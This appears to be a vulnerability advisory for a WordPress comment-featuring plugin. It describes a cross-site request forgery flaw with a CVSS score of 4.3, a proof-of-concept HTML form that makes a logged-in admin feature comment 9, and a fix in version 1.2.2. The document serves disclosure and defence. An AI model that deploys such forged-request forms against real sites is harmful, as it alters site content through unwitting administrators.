CVSS Summary
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Last revised:
An attacker able to convince an admin to visit a link of their choosing is able to set/unset the buried/featured status of any comments.
Current state: Fixed
Score | 4.3 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
If a logged-in administrator user clicks the submit button on this form comment with ID of 9 will be featured. (In a real attack the form can be made to auto-submit using Javascript).
<form action="http://localhost/wp-admin/admin-ajax.php?action=feature_comments" method="POST"> <input type="text" name="do" value="feature"> <input type="text" name="comment_id" value="9"> <input type="submit"> </form>
Upgrade to version 1.2.2 or newer.